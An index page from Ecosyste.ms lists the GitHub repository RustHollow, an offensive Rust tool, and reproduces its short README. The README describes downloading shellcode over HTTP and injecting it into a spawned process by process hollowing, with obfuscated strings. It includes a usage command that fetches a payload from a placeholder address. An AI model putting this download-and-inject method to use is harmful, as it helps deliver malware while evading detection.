Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/Kudaes/RustHollow
Inject a shellcode in a remote process using Process Hollowing.
https://github.com/Kudaes/RustHollow
Last synced: about 1 month ago
JSON representation
Inject a shellcode in a remote process using Process Hollowing.
- Host: GitHub
- URL: https://github.com/Kudaes/RustHollow
- Owner: Kudaes
- Created: 2021-09-17T12:25:20.000Z (about 3 years ago)
- Default Branch: main
- Last Pushed: 2021-09-18T12:22:49.000Z (about 3 years ago)
- Last Synced: 2024-08-02T16:30:48.206Z (4 months ago)
- Language: Rust
- Homepage:
- Size: 4.88 KB
- Stars: 40
- Watchers: 2
- Forks: 3
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
- awesome-offensive-rust - RustHollow - Inject a shellcode in a remote process using Process Hollowing. (Projects)
README
# RustHollow
This tool will use HTTP to download a shellcode from a remote address and inject it in a newly spawned process by using the process hollowing technique.
Since we are using [LITCRYPT](https://github.com/anvie/litcrypt.rs) plugin to obfuscate string literals, it is required to set up the environment variable LITCRYPT_ENCRYPT_KEY before compiling the code:set LITCRYPT_ENCRYPT_KEY="yoursupersecretkey"
After that, simply compile the code and execute it:
cargo build
rust_hollow.exe http://yourip/yourshellcode.bin